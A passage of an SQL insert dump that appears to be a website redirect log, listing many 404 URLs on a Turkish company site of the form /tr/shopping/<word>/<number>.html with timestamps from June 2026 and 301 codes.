00:00:00',301),(78639,'https://3s-technologies.com.tr/tr/shopping/polyzoary/3651446889.html',NULL,'https://3s-technologies.com.tr/shopping/polyzoary/3651446889.html','',1,0,'2026-06-11 11:26:07','0000-00-00 00:00:00',301),(78640,'https://3s-technologies.com.tr/tr/shopping/outrigged/3825939859.html',NULL,'https://3s-technologies.com.tr/shopping/outrigged/3825939859.html','',1,0,'2026-06-11 11:26:12','0000-00-00 00:00:00',301),(78641,'https://3s-technologies.com.tr/tr/shopping/anhistous/3387990987.html',NULL,'https://3s-technologies.com.tr/shopping/anhistous/3387990987.html','',1,0,'2026-06-11 11:26:17','0000-00-00 00:00:00',301),(78642,'https://3s-technologies.com.tr/tr/shopping/lathe/941760970.html',NULL,'https://3s-technologies.com.tr/shopping/lathe/941760970.html','',1,0,'2026-06-11 11:26:22','0000-00-00 00:00:00',301),(78643,'https://3s-technologies.com.tr/tr/shopping/peggeddown/1230233461.html',NULL,'https://3s-technologies.com.tr/shopping/peggeddown/1230233461.html','',1,0,'2026-06-11 11:26:27','0000-00-00 00:00:00',301),(78644,'https://3s-technologies.com.tr/tr/shopping/anathematization/4105913385.html',NULL,'https://3s-technologies.com.tr/shopping/anathematization/4105913385.html','',1,0,'2026-06-11 11:26:32','0000-00-00 00:00:00',301),(78645,'https://3s-technologies.com.tr/tr/shopping/waggish/1700235763.html',NULL,'https://3s-technologies.com.tr/shopping/waggish/1700235763.html','',1,0,'2026-06-11 11:26:37','0000-00-00 00:00:00',301),(78646,'https://3s-technologies.com.tr/tr/shopping/acknown/1267713109.html',NULL,'https://3s-technologies.com.tr/shopping/acknown/1267713109.html','',1,0,'2026-06-11 11:26:42','0000-00-00 00:00:00',301),(78647,'https://3s-technologies.com.tr/tr/shopping/prevaricating/2713021294.html',NULL,'https://3s-technologies.com.tr/shopping/prevaricating/2713021294.html','',1,0,'2026-06-11 11:26:47','0000-00-00 00:00:00',301),(78648,'https://3s-technologies.com.tr/tr/shopping/whoot/2881507687.html',NULL,'https://3s-technologies.com.tr/shopping/whoot/2881507687.html','',1,0,'2026-06-11 11:26:52','0000-00-00 00:00:00',301),(78649,'https://3s-technologies.com.tr/tr/shopping/sereneness/1317466919.html',NULL,'https://3s-technologies.com.tr/shopping/sereneness/1317466919.html','',1,0,'2026-06-11 11:27:00','0000-00-00 00:00:00',301),(78650,'https://3s-technologies.com.tr/tr/shopping/peptonoid/3779726261.html',NULL,'https://3s-technologies.com.tr/shopping/peptonoid/3779726261.html','',1,0,'2026-06-11 11:27:04','0000-00-00 00:00:00',301),(78651,'https://3s-technologies.com.tr/tr/shopping/myogale/280441829.html',NULL,'https://3s-technologies.com.tr/shopping/myogale/280441829.html','',1,0,'2026-06-11 11:27:09','0000-00-00 00:00:00',301),(78652,'https://3s-technologies.com.tr/tr/shopping/saffrony/1932832070.html',NULL,'https://3s-technologies.com.tr/shopping/saffrony/1932832070.html','',1,0,'2026-06-11 11:27:14','0000-00-00 00:00:00',301),(78653,'https://3s-technologies.com.tr/tr/shopping/molybdenite/2041567943.html',NULL,'https://3s-technologies.com.tr/shopping/molybdenite/2041567943.html','',1,0,'2026-06-11 11:27:19','0000-00-00 00:00:00',301),(78654,'https://3s-technologies.com.tr/tr/shopping/vasty/3413475041.html',NULL,'https://3s-technologies.com.tr/shopping/vasty/3413475041.html','',1,0,'2026-06-11 11:27:25','0000-00-00 00:00:00',301),(78655,'https://3s-technologies.com.tr/tr/shopping/spigurnel/2053285649.html',NULL,'https://3s-technologies.com.tr/shopping/spigurnel/2053285649.html','',1,0,'2026-06-11 11:27:29','0000-00-00 00:00:00',301),(78656,'https://3s-technologies.com.tr/tr/shopping/wrackful/3198094104.html',NULL,'https://3s-technologies.com.tr/shopping/wrackful/3198094104.html','',1,0,'2026-06-11 11:27:35','0000-00-00 00:00:00',301),(78657,'https://3s-technologies.com.tr/tr/shopping/ambulance/2055450239.html',NULL,'https://3s-technologies.com.tr/shopping/ambulance/2055450239.html','',1,0,'2026-06-11 11:27:40','0000-00-00 00:00:00',301),(78658,'https://3s-technologies.com.tr/tr/shopping/handbook/2997372478.html',NULL,'https://3s-technologies.com.tr/shopping/handbook/2997372478.html','',1,0,'2026-06-11 11:27:45','0000-00-00 00:00:00',301),(78659,'https://3s-technologies.com.tr/tr/shopping/ambushed/2383219426.html',NULL,'https://3s-technologies.com.tr/shopping/ambushed/2383219426.html','',1,0,'2026-06-11 11:27:50','0000-00-00 00:00:00',301),(78660,'https://3s-technologies.com.tr/tr/shopping/enucleation/2656016443.html',NULL,'https://3s-technologies.com.tr/shopping/enucleation/2656016443.html','',1,0,'2026-06-11 11:27:55','0000-00-00 00:00:00',301),(78661,'https://3s-technologies.com.tr/tr/shopping/suscitation/2842815940.html',NULL,'https://3s-technologies.com.tr/shopping/suscitation/2842815940.html','',1,0,'2026-06-11 11:28:00','0000-00-00 00:00:00',301),(78662,'https://3s-technologies.com.tr/tr/shopping/stratigraphical/1202977766.html',NULL,'https://3s-technologies.com.tr/shopping/stratigraphical/1202977766.html','',1,0,'2026-06-11 11:28:05','0000-00-00 00:00:00',301),(78663,'https://3s-technologies.com.tr/tr/shopping/embowelled/2974052998.html',NULL,'https://3s-technologies.com.tr/shopping/embowelled/2974052998.html','',1,0,'2026-06-11 11:28:10','0000-00-00 00:00:00',301),(78664,'https://3s-technologies.com.tr/tr/shopping/clusiaceae/2106857559.html',NULL,'https://3s-technologies.com.tr/shopping/clusiaceae/2106857559.html','',1,0,'2026-06-11 11:28:15','0000-00-00 00:00:00',301),(78665,'https://3s-technologies.com.tr/tr/shopping/rotor/3282468264.html',NULL,'https://3s-technologies.com.tr/shopping/rotor/3282468264.html','',1,0,'2026-06-11 11:28:20','0000-00-00 00:00:00',301),(78666,'https://3s-technologies.com.tr/tr/shopping/billhead/2762755968.html',NULL,'https://3s-technologies.com.tr/shopping/billhead/2762755968.html','',1,0,'2026-06-11 21:37:10','0000-00-00 00:00:00',301),(78667,'https://3s-technologies.com.tr/tr/shopping/speedier/3815806168.html',NULL,'https://3s-technologies.com.tr/shopping/speedier/3815806168.html','',1,0,'2026-06-11 21:37:13','0000-00-00 00:00:00',301),(78668,'https://3s-technologies.com.tr/tr/shopping/slavs/361541547.html',NULL,'https://3s-technologies.com.tr/shopping/slavs/361541547.html','',1,0,'2026-06-11 21:37:18','0000-00-00 00:00:00',301),(78669,'https://3s-technologies.com.tr/tr/shopping/physophorae/2046199386.html',NULL,'https://3s-technologies.com.tr/shopping/physophorae/2046199386.html','',1,0,'2026-06-11 21:37:23','0000-00-00 00:00:00',301),(78670,'https://3s-technologies.com.tr/tr/shopping/rigor/3681398879.html',NULL,'https://3s-technologies.com.tr/shopping/rigor/3681398879.html','',1,0,'2026-06-11 21:37:28','0000-00-00 00:00:00',301),(78671,'https://3s-technologies.com.tr/tr/shopping/dilution/1813916828.html',NULL,'https://3s-technologies.com.tr/shopping/dilution/1813916828.html','',1,0,'2026-06-11 21:37:33','0000-00-00 00:00:00',301),(78672,'https://3s-technologies.com.tr/tr/shopping/farinalis/1287831880.html',NULL,'https://3s-technologies.com.tr/shopping/farinalis/1287831880.html','',1,0,'2026-06-11 21:37:38','0000-00-00 00:00:00',301),(78673,'https://3s-technologies.com.tr/tr/shopping/milan/1613488586.html',NULL,'https://3s-technologies.com.tr/shopping/milan/1613488586.html','',1,0,'2026-06-11 21:37:43','0000-00-00 00:00:00',301),(78674,'https://3s-technologies.com.tr/tr/shopping/incogitative/3088190986.html',NULL,'https://3s-technologies.com.tr/shopping/incogitative/3088190986.html','',1,0,'2026-06-11 21:38:17','0000-00-00 00:00:00',301),(78675,'https://3s-technologies.com.tr/tr/shopping/arctia/1133930985.html',NULL,'https://3s-technologies.com.tr/shopping/arctia/1133930985.html','',1,0,'2026-06-11 21:38:19','0000-00-00 00:00:00',301),(78676,'https://3s-technologies.com.tr/tr/shopping/charina/3630091060.html',NULL,'https://3s-technologies.com.tr/shopping/charina/3630091060.html','',1,0,'2026-06-11 21:38:24','0000-00-00 00:00:00',301),(78677,'https://3s-technologies.com.tr/tr/shopping/arugula/2490098619.html',NULL,'https://3s-technologies.com.tr/shopping/arugula/2490098619.html','',1,0,'2026-06-11 21:38:29','0000-00-00 00:00:00',301),(78678,'https://3s-technologies.com.tr/tr/shopping/beclipped/2222253778.html',NULL,'https://3s-technologies.com.tr/shopping/beclipped/2222253778.html','',1,0,'2026-06-11 21:38:34','0000-00-00 00:00:00',301),(78679,'https://3s-technologies.com.tr/tr/shopping/favoringly/2160828222.html',NULL,'https://3s-technologies.com.tr/shopping/favoringly/2160828222.html','',1,0,'2026-06-11 21:38:39','0000-00-00 00:00:00',301),(78680,'https://3s-technologies.com.tr/tr/shopping/conspiratorial/1803475227.html',NULL,'https://3s-technologies.com.tr/shopping/conspiratorial/1803475227.html','',1,0,'2026-06-11 21:38:44','0000-00-00 00:00:00',301),(78681,'https://3s-technologies.com.tr/tr/shopping/hexagony/460383031.html',NULL,'https://3s-technologies.com.tr/shopping/hexagony/460383031.html','',1,0,'2026-06-11 21:38:49','0000-00-00 00:00:00',301),(78682,'https://3s-technologies.com.tr/tr/shopping/darkskinned/1977500716.html',NULL,'https://3s-technologies.com.tr/shopping/darkskinned/1977500716.html','',1,0,'2026-06-11 21:38:54','0000-00-00 00:00:00',301),(78683,'https://3s-technologies.com.tr/tr/shopping/polium/4182197088.html',NULL,'https://3s-technologies.com.tr/shopping/polium/4182197088.html','',1,0,'2026-06-11 21:38:59','0000-00-00 00:00:00',301),(78684,'https://3s-technologies.com.tr/tr/shopping/derworth/3079847786.html',NULL,'https://3s-technologies.com.tr/shopping/derworth/3079847786.html','',1,0,'2026-06-11 21:39:04','0000-00-00 00:00:00',301),(78685,'https://3s-technologies.com.tr/tr/shopping/troupe/2597592832.html',NULL,'https://3s-technologies.com.tr/shopping/troupe/2597592832.html','',1,0,'2026-06-11 21:39:09','0000-00-00 00:00:00',301),(78686,'https://3s-technologies.com.tr/tr/shopping/sublapsarian/2453568014.html',NULL,'https://3s-technologies.com.tr/shopping/sublapsarian/2453568014.html','',1,0,'2026-06-11 21:39:14','0000-00-00 00:00:00',301),(78687,'https://3s-technologies.com.tr/tr/shopping/emulsion/1178932484.html',NULL,'https://3s-technologies.com.tr/shopping/emulsion/1178932484.html','',1,0,'2026-06-11 21:39:19','0000-00-00 00:00:00',301),(78688,'https://3s-technologies.com.tr/tr/shopping/unchastity/2919640603.html',NULL,'https://3s-technologies.com.tr/shopping/unchastity/2919640603.html','',1,0,'2026-06-11 21:39:24','0000-00-00 00:00:00',301),(78689,'https://3s-technologies.com.tr/tr/shopping/efferent/2734060931.html',NULL,'https://3s-technologies.com.tr/shopping/efferent/2734060931.html','',1,0,'2026-06-11 21:39:29','0000-00-00 00:00:00',301),(78690,'https://3s-technologies.com.tr/tr/shopping/basipodite/1829746050.html',NULL,'https://3s-technologies.com.tr/shopping/basipodite/1829746050.html','',1,0,'2026-06-11 21:39:34','0000-00-00 00:00:00',301),(78691,'https://3s-technologies.com.tr/tr/shopping/acanthopis/4081133276.html',NULL,'https://3s-technologies.com.tr/shopping/acanthopis/4081133276.html','',1,0,'2026-06-11 21:39:39','0000-00-00 00:00:00',301),(78692,'https://3s-technologies.com.tr/tr/shopping/comfortlessly/553243581.html',NULL,'https://3s-technologies.com.tr/shopping/comfortlessly/553243581.html','',1,0,'2026-06-11 21:39:44','0000-00-00 00:00:00',301),(78693,'https://3s-technologies.com.tr/tr/shopping/anopsia/2717754453.html',NULL,'https://3s-technologies.com.tr/shopping/anopsia/2717754453.html','',1,0,'2026-06-11 21:39:53','0000-00-00 00:00:00',301),(78694,'https://3s-technologies.com.tr/tr/shopping/metallifacture/1804334151.html',NULL,'https://3s-technologies.com.tr/shopping/metallifacture/1804334151.html','',1,0,'2026-06-11 21:39:58','0000-00-00 00:00:00',301),(78695,'https://3s-technologies.com.tr/tr/shopping/yorker/1764326541.html',NULL,'https://3s-technologies.com.tr/shopping/yorker/1764326541.html','',1,0,'2026-06-11 21:40:03','0000-00-00 00:00:00',301),(78696,'https://3s-technologies.com.tr/tr/shopping/chokeberry/877530220.html',NULL,'https://3s-technologies.com.tr/shopping/chokeberry/877530220.html','',1,0,'2026-06-11 21:40:08','0000-00-00 00:00:00',301),(78697,'https://3s-technologies.com.tr/tr/shopping/immarcescible/130193168.html',NULL,'https://3s-technologies.com.tr/shopping/immarcescible/130193168.html','',1,0,'2026-06-11 21:40:13','0000-00-00 00:00:00',301),(78698,'https://3s-technologies.com.tr/tr/shopping/scrutinizing/2442672906.html',NULL,'https://3s-technologies.com.tr/shopping/scrutinizing/2442672906.html','',1,0,'2026-06-11 21:40:18','0000-00-00 00:00:00',301),(78699,'https://3s-technologies.com.tr/tr/shopping/pedicure/2728296402.html',NULL,'https://3s-technologies.com.tr/shopping/pedicure/2728296402.html','',1,0,'2026-06-11 21:40:25','0000-00-00 00:00:00',301),(78700,'https://3s-technologies.com.tr/tr/shopping/shama/1487280269.html',NULL,'https://3s-technologies.com.tr/shopping/shama/1487280269.html','',1,0,'2026-06-11 21:40:28','0000-00-00 00:00:00',301),(78701,'https://3s-technologies.com.tr/tr/shopping/lichenographic/3278023863.html',NULL,'https://3s-technologies.com.tr/shopping/lichenographic/3278023863.html','',1,0,'2026-06-11 21:40:33','0000-00-00 00:00:00',301),(78702,'https://3s-technologies.com.tr/tr/shopping/lowan/1445241394.html',NULL,'https://3s-technologies.com.tr/shopping/lowan/1445241394.html','',1,0,'2026-06-11 21:40:37','0000-00-00 00:00:00',301),(78703,'https://3s-technologies.com.tr/tr/shopping/parapophyses/1054215601.html',NULL,'https://3s-technologies.com.tr/shopping/parapophyses/1054215601.html','',1,0,'2026-06-11 21:40:43','0000-00-00 00:00:00',301),(78704,'https://3s-technologies.com.tr/tr/shopping/trecento/2934517318.html',NULL,'https://3s-technologies.com.tr/shopping/trecento/2934517318.html','',1,0,'2026-06-11 21:40:51','0000-00-00 00:00:00',301),(78705,'https://3s-technologies.com.tr/tr/shopping/homericae/1129178690.html',NULL,'https://3s-technologies.com.tr/shopping/homericae/1129178690.html','',1,0,'2026-06-11 21:40:58','0000-00-00 00:00:00',301),(78706,'https://3s-technologies.com.tr/tr/shopping/deeberry/3744789144.html',NULL,'https://3s-technologies.com.tr/shopping/deeberry/3744789144.html','',1,0,'2026-06-11 21:41:00','0000-00-00 00:00:00',301),(78707,'https://3s-technologies.com.tr/tr/shopping/hypophosphate/3088027463.html',NULL,'https://3s-technologies.com.tr/shopping/hypophosphate/3088027463.html','',1,0,'2026-06-11 21:41:05','0000-00-00 00:00:00',301),(78708,'https://3s-technologies.com.tr/tr/shopping/brashy/3325742992.html',NULL,'https://3s-technologies.com.tr/shopping/brashy/3325742992.html','',1,0,'2026-06-11 21:41:10','0000-00-00 00:00:00',301),(78709,'https://3s-technologies.com.tr/tr/shopping/wailed/3916413057.html',NULL,'https://3s-technologies.com.tr/shopping/wailed/3916413057.html','',1,0,'2026-06-11 21:41:15','0000-00-00 00:00:00',301),(78710,'https://3s-technologies.com.tr/tr/shopping/imposthume/136371778.html',NULL,'https://3s-technologies.com.tr/shopping/imposthume/136371778.html','',1,0,'2026-06-11 21:41:20','0000-00-00 00:00:00',301),(78711,'https://3s-technologies.com.tr/tr/shopping/outswear/2159875715.html',NULL,'https://3s-technologies.com.tr/shopping/outswear/2159875715.html','',1,0,'2026-06-11 21:41:25','0000-00-00 00:00:00',301),(78712,'https://3s-technologies.com.tr/tr/shopping/sphacel/3159117982.html',NULL,'https://3s-technologies.com.tr/shopping/sphacel/3159117982.html','',1,0,'2026-06-11 21:41:30','0000-00-00 00:00:00',301),(78713,'https://3s-technologies.com.tr/tr/shopping/seigh/4208599825.html',NULL,'https://3s-technologies.com.tr/shopping/seigh/4208599825.html','',1,0,'2026-06-11 21:41:35','0000-00-00 00:00:00',301),(78714,'https://3s-technologies.com.tr/tr/shopping/funambulatory/571714633.html',NULL,'https://3s-technologies.com.tr/shopping/funambulatory/571714633.html','',1,0,'2026-06-11 21:41:40','0000-00-00 00:00:00',301),(78715,'https://3s-technologies.com.tr/tr/shopping/adrenaline/2600769640.html',NULL,'https://3s-technologies.com.tr/shopping/adrenaline/2600769640.html','',1,0,'2026-06-11 21:41:45','0000-00-00 00:00:00',301),(78716,'https://3s-technologies.com.tr/tr/shopping/seamark/3368534493.html',NULL,'https://3s-technologies.com.tr/shopping/seamark/3368534493.html','',1,0,'2026-06-11 21:41:50','0000-00-00 00:00:00',301),(78717,'https://3s-technologies.com.tr/tr/shopping/horseflies/3380206239.html',NULL,'https://3s-technologies.com.tr/shopping/horseflies/3380206239.html','',1,0,'2026-06-11 21:41:57','0000-00-00 00:00:00',301),(78718,'https://3s-technologies.com.tr/tr/shopping/vanquisher/2649093703.html',NULL,'https://3s-technologies.com.tr/shopping/vanquisher/2649093703.html','',1,0,'2026-06-11 21:42:02','0000-00-00 00:00:00',301),(78719,'https://3s-technologies.com.tr/tr/shopping/myography/1413992795.html',NULL,'https://3s-technologies.com.tr/shopping/myography/1413992795.html','',1,0,'2026-06-11 21:42:06','0000-00-00 00:00:00',301),(78720,'https://3s-technologies.com.tr/tr/shopping/fescennine/4084969438.html',NULL,'https://3s-technologies.com.tr/shopping/fescennine/4084969438.html','',1,0,'2026-06-11 21:42:11','0000-00-00 00:00:00',301),(78721,'https://3s-technologies.com.tr/tr/shopping/unisonant/2470315919.html',NULL,'https://3s-technologies.com.tr/shopping/unisonant/2470315919.html','',1,0,'2026-06-11 21:42:17','0000-00-00 00:00:00',301),(78722,'https://3s-technologies.com.tr/tr/shopping/inappropriately/2717610082.html',NULL,'https://3s-technologies.com.tr/shopping/inappropriately/2717610082.html','',1,0,'2026-06-11 21:42:22','0000-00-00 00:00:00',301),(78723,'https://3s-technologies.com.tr/tr/shopping/anestrus/3525799588.html',NULL,'https://3s-technologies.com.tr/shopping/anestrus/3525799588.html','',1,0,'2026-06-11 21:42:27','0000-00-00 00:00:00',301),(78724,'https://3s-technologies.com.tr/tr/shopping/triplasian/1323431345.html',NULL,'https://3s-technologies.com.tr/shopping/triplasian/1323431345.html','',1,0,'2026-06-11 21:42:32','0000-00-00 00:00:00',301),(78725,'https://3s-technologies.com.tr/tr/shopping/preciseness/728897954.html',NULL,'https://3s-technologies.com.tr/shopping/preciseness/728897954.html','',1,0,'2026-06-11 21:42:37','0000-00-00 00:00:00',301),(78726,'https://3s-technologies.com.tr/tr/shopping/helmed/3364066573.html',NULL,'https://3s-technologies.com.tr/shopping/helmed/3364066573.html','',1,0,'2026-06-11 21:42:42','0000-00-00 00:00:00',301),(78727,'https://3s-technologies.com.tr/tr/shopping/ritchieana/3572196651.html',NULL,'https://3s-technologies.com.tr/shopping/ritchieana/3572196651.html','',1,0,'2026-06-11 21:42:47','0000-00-00 00:00:00',301),(78728,'https://3s-technologies.com.tr/tr/shopping/productiveness/2501691832.html',NULL,'https://3s-technologies.com.tr/shopping/productiveness/2501691832.html','',1,0,'2026-06-11 21:42:51','0000-00-00 00:00:00',301),(78729,'https://3s-technologies.com.tr/tr/shopping/padesoy/3594519685.html',NULL,'https://3s-technologies.com.tr/shopping/padesoy/3594519685.html','',1,0,'2026-06-11 21:42:58','0000-00-00 00:00:00',301),(78730,'https://3s-technologies.com.tr/tr/shopping/rugosa/2500695418.html',NULL,'https://3s-technologies.com.tr/shopping/rugosa/2500695418.html','',1,0,'2026-06-11 21:43:02','0000-00-00 00:00:00',301),(78731,'https://3s-technologies.com.tr/tr/shopping/guttiferous/1057248022.html',NULL,'https://3s-technologies.com.tr/shopping/guttiferous/1057248022.html','',1,0,'2026-06-11 21:43:07','0000-00-00 00:00:00',301),(78732,'https://3s-technologies.com.tr/tr/shopping/filigrain/2123000530.html',NULL,'https://3s-technologies.com.tr/shopping/filigrain/2123000530.html','',1,0,'2026-06-11 21:43:12','0000-00-00 00:00:00',301),(78733,'https://3s-technologies.com.tr/tr/shopping/alpestris/2190626784.html',NULL,'https://3s-technologies.com.tr/shopping/alpestris/2190626784.html','',1,0,'2026-06-11 21:43:17','0000-00-00 00:00:00',301),(78734,'https://3s-technologies.com.tr/tr/shopping/sexed/180623924.html',NULL,'https://3s-technologies.com.tr/shopping/sexed/180623924.html','',1,0,'2026-06-11 21:43:22','0000-00-00 00:00:00',301),(78735,'https://3s-technologies.com.tr/tr/shopping/serricornia/2814536150.html',NULL,'https://3s-technologies.com.tr/shopping/serricornia/2814536150.html','',1,0,'2026-06-11 21:43:27','0000-00-00 00:00:00',301),(78736,'https://3s-technologies.com.tr/tr/shopping/prelibation/1690852371.html',NULL,'https://3s-technologies.com.tr/shopping/prelibation/1690852371.html','',1,0,'2026-06-11 21:43:32','0000-00-00 00:00:00',301),(78737,'https://3s-technologies.com.tr/tr/shopping/shawnee/3236653800.html',NULL,'https://3s-technologies.com.tr/shopping/shawnee/3236653800.html','',1,0,'2026-06-11 21:43:37','0000-00-00 00:00:00',301),(78738,'https://3s-technologies.com.tr/tr/shopping/drabcloth/1037522578.html',NULL,'https://3s-technologies.com.tr/shopping/drabcloth/1037522578.html','',1,0,'2026-06-11 21:43:42','0000-00-00 00:00:00',301),(78739,'https://3s-technologies.com.tr/tr/shopping/reprobater/2695061274.html',NULL,'https://3s-technologies.com.tr/shopping/reprobater/2695061274.html','',1,0,'2026-06-11 21:43:47','0000-00-00 00:00:00',301),(78740,'https://3s-technologies.com.tr/tr/shopping/urethroplastic/3264508260.html',NULL,'https://3s-technologies.com.tr/shopping/urethroplastic/3264508260.html','',1,0,'2026-06-11 21:43:52','0000-00-00 00:00:00',301),(78741,'https://3s-technologies.com.tr/tr/shopping/athletics/3946555871.html',NULL,'https://3s-technologies.com.tr/shopping/athletics/3946555871.html','',1,0,'2026-06-11 21:43:57','0000-00-00 00:00:00',301),(78742,'https://3s-technologies.com.tr/tr/shopping/detenebrate/2755942847.html',NULL,'https://3s-technologies.com.tr/shopping/detenebrate/2755942847.html','',1,0,'2026-06-11 21:44:02','0000-00-00 00:00:00',301),(78743,'https://3s-technologies.com.tr/tr/shopping/hypnology/3470429841.html',NULL,'https://3s-technologies.com.tr/shopping/hypnology/3470429841.html','',1,0,'2026-06-11 21:44:07','0000-00-00 00:00:00',301),(78744,'https://3s-technologies.com.tr/tr/shopping/redeyed/513350007.html',NULL,'https://3s-technologies.com.tr/shopping/redeyed/513350007.html','',1,0,'2026-06-11 21:44:12','0000-00-00 00:00:00',301),(78745,'https://3s-technologies.com.tr/tr/shopping/pourparties/1200390061.html',NULL,'https://3s-technologies.com.tr/shopping/pourparties/1200390061.html','',1,0,'2026-06-11 21:44:17','0000-00-00 00:00:00',301),(78746,'https://3s-technologies.com.tr/tr/shopping/cremosin/2505703175.html',NULL,'https://3s-technologies.com.tr/shopping/cremosin/2505703175.html','',1,0,'2026-06-11 21:44:22','0000-00-00 00:00:00',301),(78747,'https://3s-technologies.com.tr/tr/shopping/astonishingly/1568416179.html',NULL,'https://3s-technologies.com.tr/shopping/astonishingly/1568416179.html','',1,0,'2026-06-11 21:44:28','0000-00-00 00:00:00',301),(78748,'https://3s-technologies.com.tr/tr/shopping/unwish/1309295626.html',NULL,'https://3s-technologies.com.tr/shopping/unwish/1309295626.html','',1,0,'2026-06-11 21:44:33','0000-00-00 00:00:00',301),(78749,'https://3s-technologies.com.tr/tr/shopping/hydrophobic/4255068154.html',NULL,'https://3s-technologies.com.tr/shopping/hydrophobic/4255068154.html','',1,0,'2026-06-11 21:44:38','0000-00-00 00:00:00',301),(78750,'https://3s-technologies.com.tr/tr/shopping/isatropic/3118225159.html',NULL,'https://3s-technologies.com.tr/shopping/isatropic/3118225159.html','',1,0,'2026-06-11 21:44:43','0000-00-00 00:00:00',301),(78751,'https://3s-technologies.com.tr/tr/shopping/sawhorse/1437367125.html',NULL,'https://3s-technologies.com.tr/shopping/sawhorse/1437367125.html','',1,0,'2026-06-11 21:44:48','0000-00-00 00:00:00',301),(78752,'https://3s-technologies.com.tr/tr/shopping/plantcane/3666335468.html',NULL,'https://3s-technologies.com.tr/shopping/plantcane/3666335468.html','',1,0,'2026-06-11 21:44:53','0000-00-00 00:00:00',301),(78753,'https://3s-technologies.com.tr/tr/shopping/dybbuks/1566807304.html',NULL,'https://3s-technologies.com.tr/shopping/dybbuks/1566807304.html','',1,0,'2026-06-11 21:44:58','0000-00-00 00:00:00',301),(78754,'https://3s-technologies.com.tr/tr/shopping/demonolatry/1383795215.html',NULL,'https://3s-technologies.com.tr/shopping/demonolatry/1383795215.html','',1,0,'2026-06-11 21:45:03','0000-00-00 00:00:00',301),(78755,'https://3s-technologies.com.tr/tr/shopping/bioremediation/1611796391.html',NULL,'https://3s-technologies.com.tr/shopping/bioremediation/1611796391.html','',1,0,'2026-06-11 21:45:08','0000-00-00 00:00:00',301),(78756,'https://3s-technologies.com.tr/tr/shopping/dioptrics/2579687710.html',NULL,'https://3s-technologies.com.tr/shopping/dioptrics/2579687710.html','',1,0,'2026-06-11 21:45:13','0000-00-00 00:00:00',301),(78757,'https://3s-technologies.com.tr/tr/shopping/southerland/1122546164.html',NULL,'https://3s-technologies.com.tr/shopping/southerland/1122546164.html','',1,0,'2026-06-11 21:45:18','0000-00-00 00:00:00',301),(78758,'https://3s-technologies.com.tr/tr/shopping/neighbored/2964318095.html',NULL,'https://3s-technologies.com.tr/shopping/neighbored/2964318095.html','',1,0,'2026-06-11 21:45:23','0000-00-00 00:00:00',301),(78759,'https://3s-technologies.com.tr/tr/shopping/transatlantic/1766346728.html',NULL,'https://3s-technologies.com.tr/shopping/transatlantic/1766346728.html','',1,0,'2026-06-11 21:45:28','0000-00-00 00:00:00',301),(78760,'https://3s-technologies.com.tr/tr/shopping/aries/789855132.html',NULL,'https://3s-technologies.com.tr/shopping/aries/789855132.html','',1,0,'2026-06-11 21:45:36','0000-00-00 00:00:00',301),(78761,'https://3s-technologies.com.tr/tr/shopping/escalator/3323671573.html',NULL,'https://3s-technologies.com.tr/shopping/escalator/3323671573.html','',1,0,'2026-06-11 21:45:40','0000-00-00 00:00:00',301),(78762,'https://3s-technologies.com.tr/tr/shopping/authenticly/799472139.html',NULL,'https://3s-technologies.com.tr/shopping/authenticly/799472139.html','',1,0,'2026-06-11 21:45:45','0000-00-00 00:00:00',301),(78763,'https://3s-technologies.com.tr/tr/shopping/silicum/4115442488.html',NULL,'https://3s-technologies.com.tr/shopping/silicum/4115442488.html','',1,0,'2026-06-11 21:45:54','0000-00-00 00:00:00',301),(78764,'https://3s-technologies.com.tr/tr/shopping/adjectiving/1493292619.html',NULL,'https://3s-technologies.com.tr/shopping/adjectiving/1493292619.html','',1,0,'2026-06-11 21:45:58','0000-00-00 00:00:00',301),(78765,'https://3s-technologies.com.tr/tr/shopping/botrychium/1457050292.html',NULL,'https://3s-technologies.com.tr/shopping/botrychium/1457050292.html','',1,0,'2026-06-11 21:46:03','0000-00-00 00:00:00',301),(78766,'https://3s-technologies.com.tr/tr/shopping/infuriating/1429605852.html',NULL,'https://3s-technologies.com.tr/shopping/infuriating/1429605852.html','',1,0,'2026-06-11 21:46:08','0000-00-00 00:00:00',301),(78767,'https://3s-technologies.com.tr/tr/shopping/communal/770526448.html',NULL,'https://3s-technologies.com.tr/shopping/communal/770526448.html','',1,0,'2026-06-11 21:46:14','0000-00-00 00:00:00',301),(78768,'https://3s-technologies.com.tr/tr/shopping/accountable/1145398005.html',NULL,'https://3s-technologies.com.tr/shopping/accountable/1145398005.html','',1,0,'2026-06-11 21:46:18','0000-00-00 00:00:00',301),(78769,'https://3s-technologies.com.tr/tr/shopping/italics/1264644330.html',NULL,'https://3s-technologies.com.tr/shopping/italics/1264644330.html','',1,0,'2026-06-11 21:46:24','0000-00-00 00:00:00',301),(78770,'https://3s-technologies.com.tr/tr/shopping/legislatif/2797974941.html',NULL,'https://3s-technologies.com.tr/shopping/legislatif/2797974941.html','',1,0,'2026-06-11 21:46:28','0000-00-00 00:00:00',301),(78771,'https://3s-technologies.com.tr/tr/shopping/virulented/3172754437.html',NULL,'https://3s-technologies.com.tr/shopping/virulented/3172754437.html','',1,0,'2026-06-11 21:46:33','0000-00-00 00:00:00',301),(78772,'https://3s-technologies.com.tr/tr/shopping/ursula/2618252388.html',NULL,'https://3s-technologies.com.tr/shopping/ursula/2618252388.html','',1,0,'2026-06-11 21:46:38','0000-00-00 00:00:00',301),(78773,'https://3s-technologies.com.tr/tr/shopping/followed/3657392163.html',NULL,'https://3s-technologies.com.tr/shopping/followed/3657392163.html','',1,0,'2026-06-11 21:46:43','0000-00-00 00:00:00',301),(78774,'https://3s-technologies.com.tr/tr/shopping/prolifically/3142847317.html',NULL,'https://3s-technologies.com.tr/shopping/prolifically/3142847317.html','',1,0,'2026-06-11 21:46:48','0000-00-00 00:00:00',301),(78775,'https://3s-technologies.com.tr/tr/shopping/alfresco/1808886597.html',NULL,'https://3s-technologies.com.tr/shopping/alfresco/1808886597.html','',1,0,'2026-06-11 21:46:53','0000-00-00 00:00:00',301),(78776,'https://3s-technologies.com.tr/tr/shopping/birgus/1220377674.html',NULL,'https://3s-technologies.com.tr/shopping/birgus/1220377674.html','',1,0,'2026-06-11 21:46:58','0000-00-00 00:00:00',301),(78777,'https://3s-technologies.com.tr/tr/shopping/hyrst/2441460807.html',NULL,'https://3s-technologies.com.tr/shopping/hyrst/2441460807.html','',1,0,'2026-06-11 21:47:07','0000-00-00 00:00:00',301),(78778,'https://3s-technologies.com.tr/tr/shopping/hairsalt/3934590693.html',NULL,'https://3s-technologies.com.tr/shopping/hairsalt/3934590693.html','',1,0,'2026-06-11 21:47:11','0000-00-00 